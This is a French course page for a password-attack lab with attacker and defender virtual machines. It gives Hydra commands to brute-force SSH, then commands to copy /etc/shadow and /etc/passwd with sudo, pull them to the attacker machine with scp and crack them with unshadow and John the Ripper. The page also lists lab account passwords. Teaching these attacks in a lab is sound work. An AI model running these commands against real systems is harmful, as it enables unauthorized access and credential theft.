+++
chapter = true
pre = "<b>5.2 </b>"
title = "Attaques sur l'authentification"
draft = false
weight = 55
+++

### Module 5.2

# Attaques sur l'authentification


---
title: "Atelier Mots de passe"
---

## 2 volets

1. Attaque par force brute d'une connexion SSH avec Hydra
2. Craquage des hachages de mots de passe Linux avec John The Ripper

## 2 VM

- ATK (attaquant)
- DEF (défendeur)

### VM ATK

- Utilisateur: root/abc-123
- Contient 4 listes de mots de passe:
  1. Rockyou.txt : 14 millions de mots de passe
  2. Rockyou143k.txt : sous-ensemble de rockyou.txt de 143 000 mots de passe
  3. Rockyou14k.txt : sous-ensemble de rockyou.txt de 14 000 mots de passe
  4. Rockyou145.txt : sous-ensemble de rockyou.txt de 145 mots de passe
- Programmes installés : john, hydra, et hashcat

### VM DEF

- Contient les utilisateurs suivants (leurs mots de passe entre parenthèses):
  1. nacho (blueninja)
  2. mike (pierre0903*)
  3. gus (/yonovuelvopatras*7)

## Scénario

Un utilisateur s'appelle 'nacho' et il faut accéder à son compte.

Étapes à suivre :

1. Sur ATK, créer un fichier pour les logins (logins.txt) qui contient les noms 'root' et 'nacho', un par ligne.
2. Lancer la commande hydra :
   
   ```bash
   hydra -L logins.txt -P rockyou145.txt 192.168.16.133 ssh
   ```
(mettre l’adresse IP de DEF) 

On trouve le mdp (blueninja) et on peut l’utiliser pour se connecter normalement par ssh. 

En cherchant un peu les permissions de blueninja on se rend compte qu’il est sudoer (regarder dans /etc/group, lancer la commande id…). 

Donc il peut lire /etc/shadow 

Il peut le copier dans son répertoire, mais s’il veut le télécharger dans la machine ATK il faut qu’il change les droits ou le propriétaire du fichier. Aussi il faut télécharger le fichier des utilisateurs. Dans DEF, lancer les commandes : 

   ```bash
sudo cp /etc/shadow shadow 

cp /etc/passwd passwd  

sudo chown nacho:nacho shadow 
   ```

 

Dans ATK, les commandes pour télécharger : 

   ```bash
scp nacho@192.168.16.133:/home/nacho/shadow shadow 

scp nacho@192.168.16.133:/home/nacho/passwd passwd 
   ```

 

Ces fichiers contiennent les infos des utilisateurs et des mdp. On va les deviner avec john. Les commandes sont les suivantes : 

   ```bash
unshadow passwd shadow > fichierPourJohn 

john --format=crypt --wordlist=rockyou14k.txt fichierPourJohn 
   ```

Compter environ 10 minutes